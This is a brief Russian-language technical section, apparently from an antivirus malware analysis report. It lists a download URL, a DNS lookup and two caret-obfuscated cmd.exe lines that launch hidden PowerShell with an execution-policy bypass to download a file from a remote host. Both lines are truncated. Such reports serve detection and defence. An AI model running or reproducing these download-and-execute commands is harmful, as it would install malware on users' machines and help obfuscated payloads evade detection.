Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^weRsh^EL^L^.E^x^E -e^XeCU^T^I^ON^P^Oli^c^Y^ b^YpA^Ss ^-nOPrOFi^LE^ -^Wi^nDo^wStyle^ HI^D^D^eN ^(^n^eW-oB^Je^CT ^SySTe^M.^nE^T.^WEb^clIeNt).DOwNLOAd^F^i^LE(^'http://mondayhel...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "PO^weRsh^EL^L^.E^x^E -e^XeCU^T^I^ON^P^Oli^c^Y^ b^YpA^Ss ^-nOPrOFi^LE^ -^Wi^nDo^wStyle^ HI^D^D^eN ^(^n^eW-oB^Je^CT ^SySTe^M.^nE^T.^WEb^clIeNt).DOwNLOAd^F^i^LE(^'http://mondayhel...' (со скрытым окном)